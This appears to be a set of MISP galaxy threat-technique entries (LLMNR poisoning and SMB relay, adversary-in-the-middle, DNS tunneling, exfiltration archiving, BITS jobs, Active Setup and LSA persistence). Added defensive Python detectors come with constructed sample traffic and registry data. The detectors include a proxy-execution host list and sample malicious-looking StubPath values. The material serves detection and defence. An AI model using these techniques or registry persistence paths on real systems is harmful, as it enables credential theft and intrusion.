Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. <sup>[[Wikipedia LLMNR](https://app.tidalcyber.com/references/e06d8b82-f61d-49fc-8120-b6d9e5864cc8)]</sup><sup>[[TechNet NetBIOS](https://app.tidalcyber.com/references/f756ee2e-2e79-41df-bf9f-6492a9708663)]</sup>

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) and crack the hashes offline through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.<sup>[[byt3bl33d3r NTLM Relaying](https://app.tidalcyber.com/references/34deeec2-6edc-492c-bb35-5ccb1dc8e4df)]</sup><sup>[[Secure Ideas SMB Relay](https://app.tidalcyber.com/references/ac4b2e91-f338-44c3-8950-435102136991)]</sup> Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks, such as NBNSpoof, Metasploit, and Responder.<sup>[[GitHub NBNSpoof](https://app.tidalcyber.com/references/4119091a-96f8-441c-b66f-ee0d9013d7ca)]</sup><sup>[[Rapid7 LLMNR Spoofer](https://app.tidalcyber.com/references/229b04b6-98ca-4e6f-9917-a26cfe0a7f0d)]</sup><sup>[[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]</sup>
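
A poisoner answers LLMNR/NBT-NS queries it has no business answering, so two passive signals fall out of the description above: one responder claiming many different names (a legitimate host answers only for its own), and any answer at all for a canary name that does not exist on the network. The following is an added example, not code from the MISP galaxy entry; the events are a constructed, simplified view of UDP 5355 / UDP 137 traffic, and the canary names and threshold are site-specific assumptions.

```python
"""Added example (not from the MISP galaxy entry): spot a name-resolution
poisoner from LLMNR (UDP 5355) / NBT-NS (UDP 137) traffic.

Events are a constructed, simplified view of the traffic; canary names and
the distinct-name threshold are site-specific assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NameEvent:
    proto: str           # "LLMNR" or "NBT-NS"
    kind: str            # "query" or "response"
    name: str
    src_ip: str          # the querier for queries, the responder for responses
    answer_ip: str = ""  # address returned in a response


def detect_poisoning(events, canary_names, name_threshold=3):
    """Return alerts for answered canaries and for responders that answer
    for name_threshold or more distinct names."""
    canaries = {c.lower() for c in canary_names}
    answered = defaultdict(set)      # responder -> names it claimed
    alerts = []
    for e in events:
        if e.kind != "response":
            continue
        name = e.name.lower()
        if name in canaries:
            alerts.append(f"{e.proto}: canary {e.name} answered by {e.src_ip} -> {e.answer_ip}")
        answered[e.src_ip].add(name)
    for responder, names in answered.items():
        if len(names) >= name_threshold:
            alerts.append(f"{responder} answered {len(names)} distinct names: {sorted(names)}")
    return alerts


# Constructed: the real file server answers for itself once; another host
# answers every mistyped or decommissioned name, including the canary.
SAMPLE_EVENTS = [
    NameEvent("LLMNR", "query", "fileserver", "10.0.0.5"),
    NameEvent("LLMNR", "response", "fileserver", "10.0.0.20", "10.0.0.20"),
    NameEvent("LLMNR", "query", "fileserverr", "10.0.0.5"),
    NameEvent("LLMNR", "response", "fileserverr", "10.0.0.99", "10.0.0.99"),
    NameEvent("NBT-NS", "query", "PRINTSRV01", "10.0.0.7"),
    NameEvent("NBT-NS", "response", "PRINTSRV01", "10.0.0.99", "10.0.0.99"),
    NameEvent("LLMNR", "query", "intranet-old", "10.0.0.8"),
    NameEvent("LLMNR", "response", "intranet-old", "10.0.0.99", "10.0.0.99"),
    NameEvent("LLMNR", "query", "canary-nonexistent-host", "10.0.0.250"),
    NameEvent("LLMNR", "response", "canary-nonexistent-host", "10.0.0.99", "10.0.0.99"),
]
CANARIES = ["canary-nonexistent-host"]   # assumption: a name known not to exist

if __name__ == "__main__":
    for a in detect_poisoning(SAMPLE_EVENTS, CANARIES):
        print(a)
```

The canary check is the cheaper one to run continuously: a monitoring host periodically queries a name that cannot resolve, and any response is a finding. Where LLMNR and NBT-NS are not needed, disabling them removes the poisoning step entirely, and requiring SMB signing blunts the relay step the entry describes.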

The tag is: misp-galaxy:technique="LLMNR/NBT-NS Poisoning and SMB Relay"

Adversary-in-the-Middle

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.<sup>[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]</sup>

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.<sup>[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)]</sup><sup>[[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)]</sup><sup>[[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)]</sup> Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.<sup>[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)]</sup><sup>[[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)]</sup><sup>[[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]</sup>

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).

The tag is: misp-galaxy:technique="Adversary-in-the-Middle"

DNS - Duplicate

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.<sup>[[PAN DNS Tunneling](https://app.tidalcyber.com/references/efe1c443-475b-45fc-8d33-5bf3bdf941c5)]</sup><sup>[[Medium DnsTunneling](https://app.tidalcyber.com/references/f31de733-406c-4348-b3fe-bdc30d707277)]</sup>
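
Because a tunnel has to carry its payload in the fields the entry mentions, it leaves a statistical footprint: many unique, long, high-entropy labels under one zone, often with record types (TXT, NULL) that ordinary clients rarely request. The following is an added example, not code from the MISP galaxy entry. The log lines are constructed, the "zone is the last two labels" rule and all thresholds are assumptions (a public-suffix list would be needed to group `co.uk`-style zones correctly), and the reserved `example.com` / `example.org` names stand in for real traffic.

```python
"""Added example (not from the MISP galaxy entry): per-zone heuristics for
DNS tunneling over a query log.

Log lines are constructed; the 'zone = last two labels' rule and the
thresholds are assumptions to tune against real baseline traffic.
"""
import math
from collections import Counter, defaultdict

# Constructed log: "<epoch> <client> <qname> <qtype>". The long labels under
# example.org each use every hex digit exactly twice, so their entropy is 4.0.
SAMPLE_LOG = """\
1700000000.001 10.0.0.5 www.example.com A
1700000000.120 10.0.0.5 mail.example.com MX
1700000000.300 10.0.0.6 login.example.com A
1700000000.410 10.0.0.6 cdn.example.com AAAA
1700000001.004 10.0.0.9 3f8a1c9e0b7d5246e60d4b7a25f19c83.t.example.org TXT
1700000001.210 10.0.0.9 a0b1c2d3e4f567899f8e7d6c5b4a3210.t.example.org TXT
1700000001.420 10.0.0.9 7e2c9b5f1d8a03464a6f0e1b9c3d7528.t.example.org TXT
1700000001.630 10.0.0.9 d5c4b3a2f1e098760f1e2d3c4b5a6789.t.example.org TXT
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of the observed symbol distribution in s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, client, qname, qtype = line.split()
        records.append((float(ts), client, qname.rstrip(".").lower(), qtype))
    return records


def zone_of(qname: str, depth: int = 2) -> str:
    """Assumption: the registrable zone is the last `depth` labels."""
    return ".".join(qname.split(".")[-depth:])


def find_tunnel_candidates(records, min_unique=4, min_label_len=20, min_entropy=3.0):
    """Return (zone, unique_subdomains, mean_longest_label, mean_entropy, qtype_counts)
    for every zone that exceeds all three thresholds."""
    stats = defaultdict(lambda: {"subs": set(), "lens": [], "ent": [], "qtypes": Counter()})
    for _, _, qname, qtype in records:
        zone = zone_of(qname)
        if qname == zone:
            continue
        prefix = qname[: -(len(zone) + 1)]      # strip ".zone"
        longest = max(prefix.split("."), key=len)
        st = stats[zone]
        st["subs"].add(prefix)
        st["lens"].append(len(longest))
        st["ent"].append(shannon_entropy(longest))
        st["qtypes"][qtype] += 1
    flagged = []
    for zone, st in stats.items():
        n = len(st["lens"])
        mean_len = sum(st["lens"]) / n
        mean_ent = sum(st["ent"]) / n
        if len(st["subs"]) >= min_unique and mean_len >= min_label_len and mean_ent >= min_entropy:
            flagged.append((zone, len(st["subs"]), mean_len, round(mean_ent, 3), dict(st["qtypes"])))
    return flagged


if __name__ == "__main__":
    for hit in find_tunnel_candidates(parse_log(SAMPLE_LOG)):
        print(hit)
```

Content-delivery and anti-malware vendors also generate long, high-entropy labels, so a zone allowlist built from baseline traffic belongs in front of this check; the label-length and entropy thresholds are deliberately conservative and should be tuned per environment.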

The tag is: misp-galaxy:technique="DNS - Duplicate"

File Transfer Protocols

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="File Transfer Protocols"

Mail Protocols

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="Mail Protocols"

Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S<sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup> and WebSocket<sup>[[Brazking-Websockets](https://app.tidalcyber.com/references/fa813afd-b8f0-535b-9108-6d3d3989b6b9)]</sup> that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="Web Protocols"

Application Layer Protocol

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: misp-galaxy:technique="Application Layer Protocol"

Application Window Discovery

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup> For example, information about application windows could be used to identify potential data to collect as well as to identify security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.<sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.

The tag is: misp-galaxy:technique="Application Window Discovery"

Archive via Custom Method

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.<sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:technique="Archive via Custom Method"

Archive via Library

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65) rarfile <sup>[[PyPI RAR](https://app.tidalcyber.com/references/e40d1cc8-b8c7-4f43-b6a7-c50a4f7bf1f0)]</sup>, libzip <sup>[[libzip](https://app.tidalcyber.com/references/e7008738-101c-4903-a9fc-b0bd28d66069)]</sup>, and zlib <sup>[[Zlib Github](https://app.tidalcyber.com/references/982bcacc-afb2-4bbb-9197-f44d765b9e07)]</sup>. Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

The tag is: misp-galaxy:technique="Archive via Library"

Archive via Utility

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.

On Windows, <code>diantz</code> or <code>makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. Remote Data Staging).<sup>[[diantz.exe_lolbas](https://app.tidalcyber.com/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup> <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to Base64 encode collected data before exfiltration.

Adversaries may also use third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.<sup>[[7zip Homepage](https://app.tidalcyber.com/references/fc1396d2-1ffd-4fd9-ba60-3f6e0a9dfffb)]</sup><sup>[[WinRAR Homepage](https://app.tidalcyber.com/references/c1334e4f-67c8-451f-b50a-86003f6e3d3b)]</sup><sup>[[WinZip Homepage](https://app.tidalcyber.com/references/dc047688-2ea3-415c-b516-06542048b049)]</sup>

The tag is: misp-galaxy:technique="Archive via Utility"

Archive Collected Data

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: misp-galaxy:technique="Archive Collected Data"

Audio Capture

An adversary can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: misp-galaxy:technique="Audio Capture"

Automated Collection

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.

The tag is: misp-galaxy:technique="Automated Collection"

Traffic Duplication

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. <sup>[[Cisco Traffic Mirroring](https://app.tidalcyber.com/references/1a5c86ad-d3b1-408b-a6b4-14ca0e572020)]</sup><sup>[[Juniper Traffic Mirroring](https://app.tidalcyber.com/references/a6f62986-0b62-4316-b762-021f1bb14903)]</sup>

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) or Patch System Image.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup>

Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f), or [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) depending on the goals and objectives of the adversary.

The tag is: misp-galaxy:technique="Traffic Duplication"

Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).

The tag is: misp-galaxy:technique="Automated Exfiltration"

BITS Jobs

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup><sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup> BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup><sup>[[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)]</sup><sup>[[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)]</sup> BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup><sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>

The tag is: misp-galaxy:technique="BITS Jobs"

Active Setup

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.<sup>[[Klein Active Setup 2010](https://app.tidalcyber.com/references/cbdd6290-1dda-48af-a101-fb3db6581276)]</sup> These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code>HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.<sup>[[Mandiant Glyer APT 2010](https://app.tidalcyber.com/references/bb336a6f-d76e-4535-ba81-0c7932ae91e3)]</sup><sup>[[Citizenlab Packrat 2015](https://app.tidalcyber.com/references/316f347f-3e92-4861-a075-db64adf6b6a8)]</sup><sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[SECURELIST Bright Star 2015](https://app.tidalcyber.com/references/59cba16f-91ed-458c-91c9-5b02c03678f5)]</sup><sup>[[paloalto Tropic Trooper 2016](https://app.tidalcyber.com/references/47524b17-1acd-44b1-8de5-168369fa9455)]</sup>

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:technique="Active Setup"

Authentication Package

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.<sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup>

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
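
Both autostart locations described in the Active Setup and Authentication Package entries above are plain registry values, so a defender can audit an exported hive offline. The following is an added example, not code from the MISP galaxy entry: it parses a constructed `.reg` export in regedit's text format (the REG_MULTI_SZ list is stored as `hex(7)` UTF-16LE with line continuations), flags `StubPath` values that run from outside trusted locations or through a proxy-execution host, and flags any LSA package other than the default. The trusted-path prefixes, proxy-host list and known-package set are assumptions to adapt per host; the GUIDs and the `badpkg` entry are constructed placeholders.

```python
"""Added example (not from the MISP galaxy entry): audit a .reg export for
Active Setup StubPath values and the LSA "Authentication Packages" list.

SAMPLE_REG is constructed. Trusted paths, proxy hosts and the known-package
set are assumptions to adapt to the audited host.
"""
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000001}]
"StubPath"="C:\\Windows\\System32\\unregmp2.exe /FirstLogon"
"Version"="12,0,0,1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000002}]
"StubPath"="\"C:\\Users\\Public\\Libraries\\updater.exe\" /silent"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000003}]
"StubPath"="C:\\Windows\\System32\\rundll32.exe C:\\ProgramData\\helper.dll,Start"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,62,00,61,00,64,00,\
  70,00,6b,00,67,00,00,00,00,00
"""

_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s: str) -> str:
    """Undo .reg escaping of backslash and double quote."""
    return re.sub(r"\\(.)", r"\1", s)


def _decode(data: str):
    if data.startswith('"') and data.endswith('"'):
        return "REG_SZ", _unescape(data[1:-1])
    if data.startswith("hex(7):"):                       # REG_MULTI_SZ as UTF-16LE bytes
        raw = bytes(int(b, 16) for b in data[7:].split(",") if b.strip())
        return "REG_MULTI_SZ", [s for s in raw.decode("utf-16-le").split("\x00") if s]
    if data.startswith("dword:"):
        return "REG_DWORD", int(data[6:], 16)
    return "RAW", data


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: (type, value)}} for a .reg export."""
    text = re.sub(r"\\\r?\n\s*", "", text)               # join continuation lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if current is not None and m:
            keys[current][m.group(1) or "@"] = _decode(m.group(2))
    return keys


# Assumptions for the audited host.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
PROXY_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
               "cscript.exe", "powershell.exe", "cmd.exe"}
KNOWN_AUTH_PACKAGES = {"msv1_0"}       # the default package; anything else needs a reason
ACTIVE_SETUP_ROOT = "hkey_local_machine\\software\\microsoft\\active setup\\installed components\\"
LSA_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa"


def executable_of(command: str) -> str:
    """First token of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(maxsplit=1)[0] if command else ""


def audit(reg: dict) -> list:
    findings = []
    for key, values in reg.items():
        if key.lower().startswith(ACTIVE_SETUP_ROOT) and "StubPath" in values:
            cmd = values["StubPath"][1]
            exe = executable_of(cmd).lower()
            if not exe.startswith(TRUSTED_PREFIXES):
                findings.append((key, f"StubPath outside trusted locations: {cmd}"))
            elif exe.rsplit("\\", 1)[-1] in PROXY_HOSTS:
                findings.append((key, f"StubPath runs a proxy-execution host: {cmd}"))
    for pkg in reg.get(LSA_KEY, {}).get("Authentication Packages", ("", []))[1]:
        if pkg.lower() not in KNOWN_AUTH_PACKAGES:
            findings.append((LSA_KEY, f"unexpected authentication package: {pkg}"))
    return findings


if __name__ == "__main__":
    for key, why in audit(parse_reg(SAMPLE_REG)):
        print(f"{key}\n    {why}")
```

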